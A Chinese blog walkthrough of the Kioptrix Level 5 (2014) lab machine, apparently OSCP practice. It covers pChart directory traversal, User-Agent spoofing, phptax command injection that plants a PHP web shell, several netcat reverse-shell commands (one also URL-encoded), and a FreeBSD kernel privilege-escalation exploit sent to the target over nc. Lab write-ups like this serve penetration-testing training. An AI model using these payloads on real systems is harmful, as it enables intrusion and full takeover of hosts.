Kioptrix Level 5(2014)靶机

最新推荐文章于 2026-03-18 23:45:54 发布
原创 最新推荐文章于 2026-03-18 23:45:54 发布 · 651 阅读 · 10 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#OSCP靶机 #渗透测试 #web安全 #网络安全 #权限提升

Kiotrix Level 5(2014)

一、信息搜集

1、主机发现

nmap -sP 192.168.189.142/24 -T5

发现靶机ip为192.168.189.154

2、端口服务扫描

nmap -sS -sV -p- 192.168.189.154 -T5

开放了22,80,8080端口,访问后发现8080端口的页面没有权限访问:

在这里插入图片描述

在这里插入图片描述

查看80端口页面源码,发现了一个隐藏目录:pChart2.1.3/index.php

在这里插入图片描述

访问:

在这里插入图片描述

二、漏洞利用

1、任意文件读取

web应用的名称似乎是pChart2.1.3,用searchsploit查询历史漏洞:

searchsploit pChart 2.1.3

编号31173

在这里插入图片描述

searchsploit -m 31173
cat 31173.txt

具体漏洞信息:

# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.


[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.

Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.

发现存在任意文件读取:/examples/index.php?Action=View&Script=%2f…%2f…%2fetc/passwd

在这里插入图片描述

读取apache配置

http://192.168.189.154/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf

在这里插入图片描述

根据配置文件,我们的user-agent必须要为Mozilla/4.0 Mozilla4_browser才能成功访问

2、请求头伪造

我们用BP拦截请求包,或者修改火狐浏览器配置,自定义useragent头,修改后放行可成功访问

在这里插入图片描述

在这里插入图片描述

web应用为phptax,我们搜素历史漏洞:

searchsploit phptax

发现了命令执行漏洞:

在这里插入图片描述

http://192.168.189.154:8080/phptax/drawimage.php?pfilez=xxx; nc -l -v -p 5566 -e /bin/bash;&pdf=make

尝试后不能反弹,我们尝试写入一个后门:

http://192.168.189.154:8080/phptax/drawimage.php?pfilez=xxx;echo "<?php system($_GET['cmd']);?>" > shell.php;&pdf=make

http://192.168.189.154:8080/phptax/shell.php?cmd=ls

成功返回了执行结果:

在这里插入图片描述

[!IMPORTANT]

执行命令中有空格必须要url编码,否则无法执行成功

尝试nc反弹shell,-e,-c,都无法反弹,尝试串联:

nc -lvp 5566
nc -lvp 7788

nc 192.168.189.142 5566 | /bin/bash | nc 192.168.189.142 7788   # 串联

#URL编码
%6e%63%20%31%39%32%2e%31%36%38%2e%31%38%39%2e%31%34%32%20%35%35%36%36%20%7c%20%2f%62%69%6e%2f%62%61%73%68%20%7c%20%6e%63%20%31%39%32%2e%31%36%38%2e%31%38%39%2e%31%34%32%20%37%37%38%38

执行后连接成功但瞬间断开:

在这里插入图片描述

在这里插入图片描述

最后发现net Cat可以执行反弹shell:

nc -lvp 5566

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.189.142 5566 >/tmp/f

在这里插入图片描述

在这里插入图片描述

成功反弹拿到shell

三、权限提升

1、内核提权

uname -a

在这里插入图片描述

搜索exp:

searchsploit FreeBSD 9.0

发现两个提权脚本,测试后第一个可用:

在这里插入图片描述

searchsploit -m 28718

可惜目标机器没有wget:

在这里插入图片描述

我们用nc将提权脚本传输到靶机,编译后执行

nc -lvp 8888 < 28718.c   # 攻击机
nc 192.168.189.142 8888 > kill_root.c &  # 靶机连接攻击机拿到提权脚本,加上&后台运行,避免阻塞终端

在这里插入图片描述

gcc -o kill_root kill_root.c   # 编译攻击脚本
./kill_root

在这里插入图片描述
提权成功!

Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
vulnhub-Kioptrix2014靶场
shulao2010的博客
05-26 649
通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击
Vulnhub靶机Kioptrix_2014
qq_48904485的博客
03-19 845
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
VulnHub-Kioptrix2014(#5)
热门推荐
江左盟的博客
07-21 1万+
信息收集 是 啊 啊 啊
Kioptrix 2014靶场攻略
cht6667的博客
02-24 1502
打靶遇到的一下问题和搜获的记录,希望对你有帮助
Vulnhub入门篇-Kioptrix2014
2302_78903258的博客
08-04 1405
信息收集还是非常重要的,以及对网站的信息搜索,网站使用的中间件、系统之间的漏洞都可以拿来利用,但是我上面有不足之处,并没有获得webshell,提权就是根据FreeBSD的漏洞进行利用的。
类OCSP靶场-Kioptrix系列-Kioptrix Level 5(2014)
星海幻影的博客
12-20 1546
本文主要介绍了在渗透测试网络安全攻防演练中,针对目标系统进行信息收集、漏洞挖掘以及提权过程的关键步骤。首先,文章概述了信息收集的几大重要环节,包括主机发现、端口扫描、目录爆破和敏感信息搜寻。通过这些手段,渗透测试者能够全面了解目标系统的网络拓扑、开放端口、目录结构以及潜在的安全隐患。 其次,文章深入讨论了根据服务版本信息搜索漏洞的过程。通过查找公开的漏洞利用代码(exp),并进行编译,渗透测试者能够测试并利用这些漏洞进行系统入侵。特别是如何查看并理解exp的使用方法,并加以利用,达到攻击目标系统的目的。
kioptrix靶场--level5
banliyaoguai的博客
12-31 1075
这条命令意思就是,其他人访问你的6677端口就会下载28718.c这个文件(我这里尝试28718不行换了26368.c可以)这是一个目录遍历漏洞,我们可以尝试获取用户名和密码,获取用户名后,需要进行下一个操作。然后我们需要将原来的网卡删除,再重新添加一个网卡才可以。扫描一下存活主机,也获取一下就是靶机的IP。在传递过程中靶机没有wget命令,使用nc。我们扫描一下80的目录,这里什么都没有。搜索操作系统的提权漏洞,尝试提权。回头看,这里用的是如下操作系统。扫出来的80端口进去看一看。
005靶场-Kioptrix2014-level5
qq_29726037的博客
11-27 522
主机探测:nmap -sP 192.168.115.0/24 --min-rate=1000 直接进行主机探测!nmap -p- 192.168.115.0/24 -- 主机及端口号信息都探测出来!然后通过FreeBSD官方文档: https://docs.freebsd.org/en/books/handbook/network-servers/#network-apache。探测端口服务版本信息:nmap 192.168.115.143 -T4 -A -O --min-rate=1000。
Kioptrix Level 1.1渗透测试手把手超详细教程附下载链接】
最新发布
uhszjhshdjsjsj的博客
03-18 593
本文记录了Kioptrix Level 1.1靶机的完整详细渗透测试过程,包括信息收集、漏洞发现、获取shell以及提权至root的方法附靶机下载链接。
KVM2014靶场详细练习&KVM2014靶场安装&渗透靶场练习&目录穿越&Perl&反弹Shell
jockerboss的博客
02-29 1095
Kioptrix 2014靶场&目录穿越&Perl&反弹Shell
Vulnhub靶机系列:Kioptrix: 2014 (#5)
汗的博客
04-06 1434
这次的靶机是Vulnhub靶机: 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-2014-5,62/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
Vulnhub-Kioptrix 2014 打靶
a2FpX2tr的博客
12-11 1921
通过历史漏洞读取apache配置文件,知道配置规则后访问8080,又通过8080页面的历史漏洞getshell,最后使用nc上传提权的exp,进行编译,运行后得到root权限
OSCP备战-kioptrix 2014详细步骤
2301_81864699的博客
05-15 527
移除网卡,重新添加(否则探测不了Ip的)
OSCP-Kioptrix2014-2 漏洞利用
weixin_30383279的博客
06-28 479
pChart 2.1.3 文件包含漏洞 搜索漏洞 查看漏洞理由代码: hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd 之前的8080端口禁止访问,看看apache的配置: http://192.168.1.78/pChart2.1.3/examples/...
vulhub——Kioptrix: 2014 (#5)[freebsd系统]
战神/calmness的博客
06-22 359
目录 信息收集 PChart 文件包含 目录遍历漏洞 MSF 提权 信息收集 PChart 文件包含 尝试利用漏洞,http://192.168.190.190/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd 目录遍历漏洞 由于这个系统是freebsd,所以可以知道apache的位置 该系统对应的配置文件目录/usr/lo...
OSCP-Kioptrix2014-3 后渗透测试
weixin_30316097的博客
06-28 298
拿到root权限 之前的努力,最终获得了两个session 尝试看看该操作系统的漏洞 kali: searchsploit freebsd 9.0 cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/ cd Desktop/ nc -lp 5656 < 28718.c -q 1 msf ...
Kioptrix-2
weixin_44770698的博客
12-23 420
靶场练习
Vulnhub靶机Kioptrix_2014,2024年最新网络安全面试真题精选
2401_83947353的博客
04-14 628
运行环境:Virtualbox和vmware攻击机:kali(192.168.56.101)靶机Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
oscp备考,oscp系列——Kioptix Level 5靶场详解
2202_75361164的博客
12-13 1048
oscp备考,oscp系列——Kioptix Level 5靶场 Kioptix Level 5难度为简单靶场 - nmap和目录扫描都没有发现可以直接利用的点 - 通过80端口发现pChart2.1.3任意文件读取漏洞,8080不能禁止访问,猜测里面有可以getshell的漏洞,尝试读取freebsd系统的Apache默认文件 - 发现限制了User-Agent,只允许User-Agent:Mozilla/4.0访问,访问之后,发现phptax远程代码执行漏洞 - 最后进行freebsd内核提权即可
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值